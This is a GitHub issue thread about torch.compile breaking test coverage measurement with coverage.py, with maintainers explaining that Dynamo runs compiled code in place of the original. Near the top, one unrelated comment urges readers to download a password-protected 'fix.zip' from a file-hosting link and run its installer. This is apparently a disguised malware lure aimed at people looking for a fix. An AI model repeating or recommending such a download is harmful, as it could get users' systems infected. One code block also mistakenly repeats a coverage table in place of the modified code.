### ISSUE TITLE
torch.compile does not work with test coverage tools

### ISSUE THREAD

**Issue by youkaichao** [pytorch/pytorch#134447]
### 🐛 Describe the bug

I'm using the https://github.com/nedbat/coveragepy tool to measure the test coverage. However, I find that it does not work with `torch.compile` .

Simple example:

Before compilation:

```python
import torch

def f(a, b):
    return a + b

def main():
    x = torch.tensor([1.0])
    y = f(x, x)

if __name__ == "__main__":
    main()
```

The test coverage is 100%:
```
Name      Stmts   Miss  Cover
-----------------------------
test.py       8      0   100%
-----------------------------
TOTAL         8      0   100%
```

After adding compilation:

```python
Name      Stmts   Miss  Cover
-----------------------------
test.py       8      0   100%
-----------------------------
TOTAL         8      0   100%
```

The test coverage becomes strange:

```
Name                                                                                                                                           Stmts   Miss  Cover
------------------------------------------------------------------------------------------------------------------------------------------------------------------
/private/var/folders/vm/ssf622nn02j77t14q1j8_88w0000gn/T/torchinductor_youkaichao/2n/c2nik4kqmsegweniz3iby2lmum7hoc3jkbo7sc6t3awa3vcwa4hu.py      43      7    84%
test.py                                                                                                                                            9      1    89%
------------------------------------------------------------------------------------------------------------------------------------------------------------------
TOTAL                                                                                                                                             52      8    85%
```

The new generated file might be irrelevant, but how can we make it work for the `test.py` ?

### Versions

2.4.0 official release

cc @ezyang @chauhang @penguinwu

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ezyang** [comment]
I'd probably propose instructing coveragepy to exclude these files

**Comment by youkaichao** [comment]
@ezyang thanks for the response. I'm not worried about the generated file. I can easily exclude the generated file.

However, I'm asking if we can do anything to fix the `test.py` . After `torch.compile` , it has one test coverage miss.

**Comment by ezyang** [comment]
Oh if I had to guess, it's because we didn't actually execute the code, instead we executed to the compiled code, and coverage.py doesn't know how to map the generated code to the original source code.

I guess a super fancy approach would be to teach Dynamo to write to coverage.py's coverage format as it Dynamo traces so that when we compile code it counts as covered. Not sure lol.

**Comment by jansel** [comment]
Yeah, I can confirm this is because dynamo doesn't actually run the original Python (it runs a compiled version of it).  

If you just want to compute coverage, you can disable dynamo temporarily (env TORCHDYNAMO_DISABLE=1).

Contributions are welcome to make torch.compile interoperate with coverage.

**Comment by youkaichao** [comment]
I admit test coverage with `torch.compile` is tricky, in the sense that dynamo does not execute the bytecode but just symbolically evaluate it.

thanks for the response!

**Comment by ezyang** [comment]
FWIW, I think it is actually feasible to interoperate with the hooks that coveragepy does, just definitely not a priority for us haha

**Comment by jansel** [comment]
I agree this is doable, more specifically this function:
https://github.com/pytorch/pytorch/blob/ca03a14cf744337b94f5cb56e5a8f4738617c3a7/torch/_dynamo/symbolic_convert.py#L854-L860

Would need some new logic that called some into a coverage API to say "this line is covered".

**Comment by youkaichao** [comment]
we need someone who understands `coverage` then :)
